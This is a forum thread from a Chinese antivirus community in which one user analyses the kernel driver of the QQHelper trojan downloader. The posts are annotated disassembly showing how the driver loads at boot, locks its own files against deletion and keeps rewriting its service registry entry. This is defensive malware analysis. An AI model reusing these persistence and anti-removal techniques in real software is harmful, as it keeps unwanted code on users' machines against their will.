木马程序 Trojan-Downloader.Win32.QQHelper.mo 驱动代码分析 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛木马程序 Trojan-Downloader.Win32.QQHelper.mo 驱动代码分析

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

木马程序 Trojan-Downloader.Win32.QQHelper.mo 驱动代码分析

荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:	发表于： 2006-10-20 15:25 \| 显示全部短消息资料字号：小中大 1楼木马程序 Trojan-Downloader.Win32.QQHelper.mo 驱动代码分析木马程序 Trojan-Downloader.Win32.QQHelper.mo 驱动代码分析 DriverReinitializationRoutine proc near ;;;首先是熟悉的DriverReinitalizationRoutine ;;;该驱动一样是BOOT级别的，和操作系统一起加载 ;;;因此用文件粉碎器之类的东西是无效的 DriverObject= dword ptr 8 mov edi, edi push ebp mov ebp, esp call sub_1049E ;;;时间起见，子程序名我就不改了，这里不猜也知道是 TestSystemRoot test eax, eax jnz short loc_106A9 ;加载成功，跳loc_106a9 push eax ; Context push offset DriverReinitializationRoutine ; DriverReinitializationRoutine push [ebp+DriverObject] ; DriverObject call ds:IoRegisterDriverReinitialization jmp short loc_106B0 ;否则就继续下一轮检测 loc_106A9: push 1 call sub_1057A ;成功加载，并调用sub_1057a loc_106B0: pop ebp retn 0Ch DriverReinitializationRoutine endp sub_1057A proc near ;这是初始化时会调用的 FileHandle= byte ptr -40h var_4= dword ptr -4 arg_0= dword ptr 8 mov edi, edi push ebp mov ebp, esp sub esp, 40h mov eax, dword_11280 push ebx push esi mov esi, ds:sprintf push edi push 0Fh pop ecx mov [ebp+var_4], eax xor eax, eax mov ebx, offset byte_11288 lea edi, [ebp+FileHandle] push ebx rep stosd lea eax, [ebp+FileHandle] push offset s_SystemrootSys ; "[url=file://\\SystemRoot\\system32\\drivers\\%s.sys]\\SystemRoot\\system32\\drivers\\%s.sys[/url]" push eax ; char * call esi ; sprintf ; 得到随机的sys文件名 add esp, 0Ch cmp [ebp+arg_0], 1 jnz short loc_105DC mov eax, Handle test eax, eax jz short loc_105CE push eax ; Handle call ds:ZwClose ;先把文件关闭！ and Handle, 0 loc_105CE: ; int push offset dword_114D0 lea eax, [ebp+FileHandle] push eax ; FileHandle call sub_10BB8 ;调用锁主文件的子程序，作用使用ZwCreateFile把文件占住，不给删除！ loc_105DC: cmp [ebp+arg_0], 0 jnz short loc_10607 mov eax, dword_114D0 test eax, eax jz short loc_105F9 push eax ; Handle call ds:ZwClose and dword_114D0, 0 loc_105F9: ; int push offset Handle lea eax, [ebp+FileHandle] push eax ; FileHandle call sub_10BB8 loc_10607: push 0Fh pop ecx xor eax, eax lea edi, [ebp+FileHandle] push ebx rep stosd lea eax, [ebp+FileHandle] push offset s_SystemrootS_0 ; "[url=file://\\SystemRoot\\system32\\%s.dll]\\SystemRoot\\system32\\%s.dll[/url]" push eax ; char * call esi ; sprintf add esp, 0Ch cmp [ebp+arg_0], 1 pop edi pop esi pop ebx jnz short loc_1064E mov eax, dword_114D8 test eax, eax jz short loc_10640 push eax ; Handle call ds:ZwClose ;先关闭！ and dword_114D8, 0 loc_10640: ; int push offset dword_114E0 lea eax, [ebp+FileHandle] push eax ; FileHandle call sub_10BB8 loc_1064E: cmp [ebp+arg_0], 0 jnz short loc_10679 mov eax, dword_114E0 test eax, eax jz short loc_1066B push eax ; Handle call ds:ZwClose and dword_114E0, 0 loc_1066B: ; int push offset dword_114D8 lea eax, [ebp+FileHandle] push eax ; FileHandle call sub_10BB8 ;调用锁主文件的子程序，作用使用ZwCreateFile把文件占住，不给删除！ loc_10679: mov ecx, [ebp+var_4] call sub_1104F leave retn 4 sub_1057A endp 这里可以看出驱动在操作系统加载时加载，所做的事就是抢先把自己的文件（驱动和DLL）全部占住，不让其他程序读写或删除！ 2006-10-20 16:20:55
荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:	分享到：

荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:	发表于： 2006-10-20 15:33 \| 显示全部短消息资料字号：小中大 2楼这里可以看出驱动在操作系统加载时加载，所做的事就是抢先把自己的文件（驱动和DLL）全部占住，不让其他程序读写或删除！前段时间刚刚发现用文件粉碎器这类软件可以完全粉碎文件，当时还挺激动了一小会儿。结果没多久，针对这类防范的东西就出来了。不过有一点可以肯定，DOS下肯定什么文件都能删掉，哈~~
荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:

荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:	发表于： 2006-10-20 15:35 \| 显示全部短消息资料字号：小中大 3楼 ;;; ;;;下面是start李程 public start start proc near ; FUNCTION CHUNK AT 000106D8 SIZE 0000016F BYTES mov eax, dword_11280 test eax, eax mov ecx, 0BB40E64Eh jz short loc_11517 cmp eax, ecx jnz short loc_11530 loc_11517: mov eax, ds:KeTickCount mov eax, [eax] xor eax, offset dword_11280 mov dword_11280, eax jnz short loc_11530 mov dword_11280, ecx loc_11530: jmp loc_106D8 start endp ;跳loc_106D8 loc_106D8: mov edi, edi push ebp mov ebp, esp sub esp, 10h push ebx push esi push edi xor eax, eax mov edi, offset byte_11288 stosd stosd stosd stosd stosd xor eax, eax push 0Ah pop ecx mov ebx, offset word_112C8 mov edi, offset word_1129C rep stosd mov ecx, 80h mov edi, ebx rep stosd mov eax, [ebp+0Ch] movzx ecx, word ptr [eax] mov esi, [eax+4] mov eax, ecx shr ecx, 2 mov edi, ebx rep movsd mov ecx, eax and ecx, 3 push ebx ; wchar_t * rep movsb call ds:_wcslwr push 5Ch ; wchar_t push ebx ; wchar_t * call ds:wcsrchr xor ebx, ebx add esp, 0Ch cmp eax, ebx jz loc_1083B add eax, 2 push eax ; SourceString lea eax, [ebp-8] push eax ; DestinationString call ds:RtlInitUnicodeString movzx ecx, word ptr [ebp-8] mov esi, [ebp-4] mov edx, ecx mov eax, offset word_1129C shr ecx, 2 mov edi, eax rep movsd mov ecx, edx and ecx, 3 push eax ; wchar_t * rep movsb call ds:_wcslwr pop ecx push 1 ; AllocateDestinationString lea eax, [ebp-8] push eax ; SourceString lea eax, [ebp-10h] push eax ; DestinationString call ds:RtlUnicodeStringToAnsiString ;上面是在把aNSI字符串转为unicode的，内核接口要用！ mov esi, eax cmp esi, ebx jl loc_1083E movzx ecx, word ptr [ebp-10h] mov esi, [ebp-0Ch] mov edx, ecx mov eax, offset byte_11288 shr ecx, 2 mov edi, eax rep movsd mov ecx, edx and ecx, 3 push eax ; char * rep movsb call ds:_strlwr pop ecx call sub_10854 push ebx ; StartContext push offset StartRoutine ; StartRoutine push ebx ; ClientId push ebx ; ProcessHandle push ebx ; ObjectAttributes mov dword_114C8, eax push ebx ; DesiredAccess lea eax, [ebp+0Ch] push eax ; ThreadHandle call dssCreateSystemThread ;创建StartRoutine的Thread! push dword ptr [ebp+0Ch] ; Handle call ds:ZwClose xor esi, esi inc esi mov dword_114E4, esi mov dword_114E0, ebx mov dword_114D4, esi mov dword_114D0, ebx mov dword_114DC, ebx mov dword_114D8, ebx mov dword_114EC, ebx mov Handle, ebx call sub_1049E ;这里又是TestSystemRoot test eax, eax jz short loc_1081A push esi call sub_1057A ;这里是用ZwCreateFile占住文件！ jmp short loc_10822 loc_1081A: ; DriverObject push dword ptr [ebp+8] call sub_106BA ;没有加载成功，继续Reinit,直到加载成功！ loc_10822: ; Remove push ebx push offset NotifyRoutine ; NotifyRoutine call PsSetCreateProcessNotifyRoutine mov esi, eax lea eax, [ebp-10h] push eax ; AnsiString call ds:RtlFreeAnsiString jmp short loc_1083E loc_1083B: mov esi, [ebp+0Ch] loc_1083E: pop edi mov eax, esi pop esi pop ebx leave retn 8
荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:

荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:	发表于： 2006-10-20 15:51 \| 显示全部短消息资料字号：小中大 4楼 StartRoutine proc near ;这个就是创建的系统线程执行的代码了！ ;和piaoxue的完全一样！我就不分析了 ;感觉这个驱动可能出自一个人之手 ;甚至更有可能的是，这种驱动是有组织的！ ;组织间不同的流氓软件制造者共享着驱动代码（因驱动比较难写！） DestinationString= UNICODE_STRING ptr -374h var_36C= dword ptr -36Ch ValueName= UNICODE_STRING ptr -364h var_35C= dword ptr -35Ch var_354= dword ptr -354h var_34C= dword ptr -34Ch var_344= dword ptr -344h var_33C= dword ptr -33Ch ObjectAttributes= OBJECT_ATTRIBUTES ptr -334h var_31C= dword ptr -31Ch Data= dword ptr -318h Interval= LARGE_INTEGER ptr -314h var_30C= dword ptr -30Ch Handle= dword ptr -308h SourceString= word ptr -304h var_29A= dword ptr -29Ah var_104= byte ptr -104h var_4= dword ptr -4 mov edi, edi push ebp mov ebp, esp sub esp, 374h mov eax, dword_11280 push ebx push esi push edi push 3Fh mov [ebp+var_4], eax pop ecx xor eax, eax xor ebx, ebx mov [ebp+var_104], bl lea edi, [ebp-103h] rep stosd stosw stosb push 1Ah pop ecx mov esi, offset s_RegistryMachi ; "\\registry\\machine\\system\\currentcontrol"... lea edi, [ebp+SourceString] rep movsd movsw push 65h pop ecx xor eax, eax lea edi, [ebp+var_29A] rep stosd stosw mov edi, offset word_1129C lea eax, [ebp+SourceString] push edi ; wchar_t * push eax ; wchar_t * mov [ebp+var_30C], 1 call ds:wcscat mov esi, ds:RtlInitUnicodeString pop ecx pop ecx lea eax, [ebp+SourceString] push eax ; SourceString lea eax, [ebp+DestinationString] push eax ; DestinationString call esi ; RtlInitUnicodeString lea eax, [ebp+DestinationString] mov [ebp+ObjectAttributes.ObjectName], eax push offset s_Imagepath ; "ImagePath" lea eax, [ebp+ValueName] push eax ; DestinationString mov [ebp+ObjectAttributes.Length], 18h mov [ebp+ObjectAttributes.RootDirectory], ebx mov [ebp+ObjectAttributes.Attributes], 240h mov [ebp+ObjectAttributes.SecurityDescriptor], ebx mov [ebp+ObjectAttributes.SecurityQualityOfService], ebx call esi ; RtlInitUnicodeString push offset s_Start ; "Start" lea eax, [ebp+var_344] push eax ; DestinationString call esi ; RtlInitUnicodeString push offset s_Type ; "Type" lea eax, [ebp+var_33C] push eax ; DestinationString call esi ; RtlInitUnicodeString push offset s_Errorcontrol ; "ErrorControl" lea eax, [ebp+var_34C] push eax ; DestinationString call esi ; RtlInitUnicodeString push offset s_Displayname ; "DisplayName" lea eax, [ebp+var_36C] push eax ; DestinationString call esi ; RtlInitUnicodeString push offset s_Group ; "Group" lea eax, [ebp+var_35C] push eax ; DestinationString call esi ; RtlInitUnicodeString or dword ptr [ebp+Interval+4], 0FFFFFFFFh push offset byte_11288 lea eax, [ebp+var_104] push offset s_System32Drive ; "System32\\DRIVERS\\%s.sys" push eax ; char * mov dword ptr [ebp+Interval], 0FF676980h call ds:sprintf add esp, 0Ch lea eax, [ebp+var_104] push eax ; SourceString lea eax, [ebp+var_354] push eax ; DestinationString call ds:RtlInitAnsiString push 1 ; AllocateDestinationString lea eax, [ebp+var_354] push eax ; SourceString lea eax, [ebp+var_31C] push eax ; DestinationString call ds:RtlAnsiStringToUnicodeString test eax, eax jl loc_11024 mov esi, ds:ZwSetValueKey loc_10F1B: ; Disposition push ebx push ebx ; CreateOptions push ebx ; Class push ebx ; TitleIndex lea eax, [ebp+ObjectAttributes] push eax ; ObjectAttributes push 2 ; DesiredAccess lea eax, [ebp+Handle] push eax ; KeyHandle call ds:ZwCreateKey test eax, eax jl loc_11010 movzx eax, word ptr [ebp+var_31C] inc eax inc eax push eax ; DataSize push [ebp+Data] ; Data lea eax, [ebp+ValueName] push 2 ; Type push ebx ; TitleIndex push eax ; ValueName push [ebp+Handle] ; KeyHandle mov [ebp+var_30C], 1 call esi ; ZwSetValueKey push 4 ; DataSize lea eax, [ebp+var_30C] push eax ; Data push 4 ; Type push ebx ; TitleIndex lea eax, [ebp+var_33C] push eax ; ValueName push [ebp+Handle] ; KeyHandle call esi ; ZwSetValueKey push 4 ; DataSize lea eax, [ebp+var_30C] push eax ; Data push 4 ; Type push ebx ; TitleIndex lea eax, [ebp+var_34C] push eax ; ValueName push [ebp+Handle] ; KeyHandle call esi ; ZwSetValueKey push edi ; wchar_t * call ds:wcslen pop ecx shl eax, 1 push eax ; DataSize push edi ; Data push 1 ; Type push ebx ; TitleIndex lea eax, [ebp+var_36C] push eax ; ValueName push [ebp+Handle] ; KeyHandle call esi ; ZwSetValueKey push offset s_SystemBusExte ; "System Bus Extender" call ds:wcslen pop ecx shl eax, 1 push eax ; DataSize push offset s_SystemBusExte ; "System Bus Extender" push 1 ; Type push ebx ; TitleIndex lea eax, [ebp+var_35C] push eax ; ValueName push [ebp+Handle] ; KeyHandle call esi ; ZwSetValueKey push 4 ; DataSize lea eax, [ebp+var_30C] push eax ; Data push 4 ; Type push ebx ; TitleIndex lea eax, [ebp+var_344] push eax ; ValueName push [ebp+Handle] ; KeyHandle mov [ebp+var_30C], ebx call esi ; ZwSetValueKey push [ebp+Handle] ; Handle call ds:ZwClose loc_11010: lea eax, [ebp+Interval] push eax ; Interval push ebx ; Alertable push ebx ; WaitMode call ds:KeDelayExecutionThread jmp loc_10F1B loc_11024: mov ecx, [ebp+var_4] pop edi pop esi pop ebx call sub_1104F leave retn 4 StartRoutine endp ;这里的作用就是不断重写自己的服务注册表项，以防止被删除！果然够狠的！
荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:

荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:	发表于： 2006-10-20 15:52 \| 显示全部短消息资料字号：小中大 5楼从上面分析看来驱动出自同一组织。。。看来是收了不少钱的。。。。这个倒好，一招先，吃翻天~~~ 这种东西，稍微改一下就可以了（自己都可以拿了那个驱动，然后改成自己的网站，然后四处发就可以了）看来最后必须要法律这根底线来保障众生了~~~
荣俊哥︻┻┲— 快乐黄口狮帖子:199 注册: 2006-08-29 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT